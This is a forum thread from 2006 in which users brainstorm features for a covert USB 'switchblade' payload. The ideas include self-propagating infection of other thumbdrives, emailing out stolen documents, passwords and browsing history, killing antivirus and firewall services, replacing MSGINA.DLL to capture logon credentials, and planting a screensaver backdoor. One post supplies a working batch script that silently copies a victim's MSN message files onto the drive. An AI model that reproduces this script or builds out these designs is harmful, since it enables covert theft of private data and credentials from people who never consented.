Moo Posted October 29, 2006 Posted October 29, 2006 Well, I can't make em, but we can give developers ideas here. Feel free to add on. I want... Something that will email all new documents on the computer to an email address. Something to infect any other USB thumbdrives put into computer, that will propagate and do all this stuff. A antidote that only takes off certain parts. Maybe something that would listen for a signal and open a certain website when told a url through a program. Something that would send you history, passwords every so often through email. Quote
spektormax Posted October 29, 2006 Posted October 29, 2006 Something that will email all new documents on the computer to an email address. -- coudl be done but messy. Something to infect any other USB thumbdrives put into computer, that will propagate and do all this stuff. --I've built it but wont reslise it public for a while for fear of skiddies using it to procreate thier botnets. Pm me if you want it A antidote that only takes off certain parts. --edit the batch Maybe something that would listen for a signal and open a certain website when told a url through a program. --why, and it would be very hard since most peopel have routers/firewalls Something that would send you history, passwords every so often through email.--will be built into packages (but only sent once becasue doign it more than that requires ceduling tasks whic h is visible) Quote
Shiva Posted November 11, 2006 Posted November 11, 2006 how bout a feature that checks da local installed firewall for apps dat have permission to access the net, and then use those programs to send out the mail, instead of disabling / re-enabling the firewall or messy stuff like that. It would b kewl since, getting at the info is not a prob, getting it out and to you in a manner to not alert any trace of suspicion is the trickier part Quote
renegadecanuck Posted November 11, 2006 Posted November 11, 2006 Documents - Like Spektro said, would be very messy Infect - Trust me, you do NOT want that. It could easily come back to bite you in the ass. VNC is set with a default password, so anyone whos visitied this site could connect to the box if they discover one is infected (unlikly, but possible). Amung many other ethical issues. Semi Antidote - Pretty much already in my payload, but hte VNC one has a few flaws (which are easy to fix), but I'm not sure if I'm gonna keep uploading my progress since I'm owrried about script kiddies. @Shiva: Please don't use text message speak (plz dnt use txt spk), it makes your message VERY hard to read (i cnt undrstnd it), and the feature you requested would be pretty difficult to accomplish, especially in a automated switchblade (to fukin hard). Nay, I think it would be impossible to do (no fukin way). P.S. I have mays of making you say "the", "that" and "be". Quote
Shiva Posted November 13, 2006 Posted November 13, 2006 hi Renegaecanuck, how about using http streaming to bypass firewalls? Since most firewalls are set up to allow HTTP traffic to go through which will of course mean both conections will have to be on at the same time. But at least this way, the level of suspicion aroused is tiny if not nil :D Quote
renegadecanuck Posted November 13, 2006 Posted November 13, 2006 Shiva, thanks for typing normally, and sorry if I sounded like a condescending ass. So what you're basically thinking is using a web-based app to detect what firewall a target is using and what programs have authorization? Obviously detecting the firewall would easy (if you can code), and if you know enough about the firewall (such as where it stores its "safe" programs lists), you can find out what programs are allowed. And then you CAN use those programs to send information. So I take back what I said about it being impossible, but it would be difficult to do (at least for someone like me who knows very little about coding). And I may have over complicated it , but (especially if a person does it my way), there would be quite a bit of code to cover all the variables (different types of firewalls, different allowed programs, etc). Quote
Spartain X Posted November 13, 2006 Posted November 13, 2006 for the firewall part i have developed a bat that stops the service and kills that program, this can be easily adapted so the service is paused if any one is interested i can supply the files. unfortunitly it works on AVG, Bit defender and macafee and soon avast (this is mainly due to me not having access to most commercial av's and firewalls) Quote
remkow Posted November 13, 2006 Posted November 13, 2006 Could you post the batch file?? I currently only have sygate, and for the AVs I have bitdefender and avast Quote
Shiva Posted November 14, 2006 Posted November 14, 2006 Sorry for the typos earlier - Obviously detecting the firewall would easy (if you can code), and if you know enough about the firewall (such as where it stores its "safe" programs lists), you can find out what programs are allowed. And then you CAN use those programs to send information. erm ... instead catering to a bunch of firewalls, how bout targetting only the most frequently used 1, such as Zone Alarm - its popular - and its pretty good. So a succesful pentest on that would pave the way for others?? LOL ZA by default gives, the default browser, alg.exe (application layer Gateway Service, svchost.exe (Generic Host Process for Win32 Services), access to the net. Quote
renegadecanuck Posted November 14, 2006 Posted November 14, 2006 Ok, great, if the target machine uses Zone Alarm. But for the rest of the computers that don't, it's useless. Quote
Psycho275 Posted November 17, 2006 Posted November 17, 2006 A suggestion: Instead of just dumping local password hashes or hashes from cached LDAP logins, why not "steal" the username and password straight from where it's input... WINLOGON / GINA. It is possible to create a custom version of MSGINA.DLL and tell Winlogon to use it [source]. I don't have enough programming knowledge / experience to code a replacement DLL for GINA myself, but perhaps someone else could? The replacement for MSGINA.DLL could be "capture" the username and passwords of users who logon, write it to a text file, then use the method used by the USB Hacksaw to connect to gmail and send the usernames and passwords at certain intervals. From what I've read, it would be possible to create a replacement for MSGINA.DLL, change the registry to point to the replacement (Avoiding the problem of Windows System File Protection), use the same method as the USB Hacksaw to run a service / program at logon which could periodically send the contents of the username and password file to the gmail account. Obviously this would require administrator privileges, but I'm sure it's possible. One other suggestion: A replacement screensaver which launches cmd.exe at the logon screen when a certain key combination is pressed? Again, just a simple screensaver, a small "backdoor" and a quick registry change. --Psycho275 References for first suggestion: http://msdn.microsoft.com/library/default....curity/gina.asp http://msdn.microsoft.com/library/default....on_and_gina.asp http://www.microsoft.com/technet/prodtechn...ity/msgina.mspx http://msdn.microsoft.com/library/default....on_and_gina.asp http://msdn.microsoft.com/msdnmag/issues/0...SecurityBriefs/ http://msdn2.microsoft.com/en-gb/library/aa375198.aspx http://www.microsoft.com/technet/prodtechn...ity/msgina.mspx http://en.wikipedia.org/wiki/GINA http://en.wikipedia.org/wiki/Winlogon Quote
u3man2007 Posted November 24, 2006 Posted November 24, 2006 I think it would be nice if this U3 hak had the ability to ... - Copy all data from one thumb drive to another thumdrive as they are both in the computer at the same time... for example 1 Somebody already is sitting down at their computer working away with their own thumdrive already plugged in. 2 Then somebody else comes along and plugs their own thumdrive into another usb port on that same computer. 3 Finally that new persons thumbdrive automatically intercepts all data on the original persons thumb drive while both drives are plugged in. I don't think this would be too hard to do, but my question is how do you configure the always changing drive letters to the thumbdrives?? Let me know what you guys think?? (If it is as simple as a .bat or editing the .cmd file, then would somebody show me the code for it ??) thanks Quote
SmoothCriminal Posted November 24, 2006 Posted November 24, 2006 An easy way to stop it from hacking Quote
renegadecanuck Posted November 25, 2006 Posted November 25, 2006 As in avoid running the scripts, you can either renamed the go.cmd, or hold shift while plugging it in. If you mean cancel half way through, it would basically be impossible since we're trying to do this silently without anyone noticing, and the only way to enable disability would be to make a command prompt show up. Quote
majk Posted November 25, 2006 Posted November 25, 2006 As in avoid running the scripts, you can either renamed the go.cmd, or hold shift while plugging it in.If you mean cancel half way through, it would basically be impossible since we're trying to do this silently without anyone noticing, and the only way to enable disability would be to make a command prompt show up. Why not just rip out the USB? Quote
renegadecanuck Posted November 25, 2006 Posted November 25, 2006 1. Might cause file corruption or wreak the drive if you rip it out while its reading form or writing to it (I've lost all data on it before that way) 2. Kinda defeats SC's purpose form what I gather. Quote
sm.ith Posted November 26, 2006 Posted November 26, 2006 what if the usb copied peoples saved msn convos that might take up alot of space but it would be pretty cool Quote
majk Posted November 26, 2006 Posted November 26, 2006 what if the usb copied peoples saved msn convosthat might take up alot of space but it would be pretty cool It should be easy to have it copy the files from where MSN stores its logs to the USB. Quote
DLSS Posted November 26, 2006 Posted November 26, 2006 what if the usb copied peoples saved msn convosthat might take up alot of space but it would be pretty cool It should be easy to have it copy the files from where MSN stores its logs to the USB. yeah i've written this before .... ifi'm not mistaking its somewere ion this forum ... hell or just give me the save location and i'll rewrite it ... here u go : @echo off :: msngrab.cmd :makedir mkdir %~d0grabmsnlogs%computername%-%username% :english xcopy "C:Documents and Settings%username%My DocumentsMy Received Files*.xml" "%~d0grabmsnlogs%computername%-%username%" /s/c/q/r/h/y xcopy "C:Documents and Settings%username%My DocumentsMy Received Files*.xsl" "%~d0grabmsnlogs%computername%-%username%" /s/c/q/r/h/y :dutch xcopy "C:Documents and Settings%username%Mijn documentenMijn ontvangen*.xml" "%~d0grabmsnlogs%computername%-%username%" /s/c/q/r/h/y xcopy "C:Documents and Settings%username%Mijn documentenMijn ontvangen*.xsl" "%~d0grabmsnlogs%computername%-%username%" /s/c/q/r/h/y cls cd exit note's : - only works on english and dutch installs of windows (other languages give the my documents and recieved fiels a different name) - only works if they have their logs folder set to the standard one. Quote
Slopigyo Posted December 22, 2006 Posted December 22, 2006 Something that would send you history, passwords every so often through email.--will be built into packages (but only sent once becasue doign it more than that requires ceduling tasks whic h is visible) Just have is send whenever another action happens like the hacksaw. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.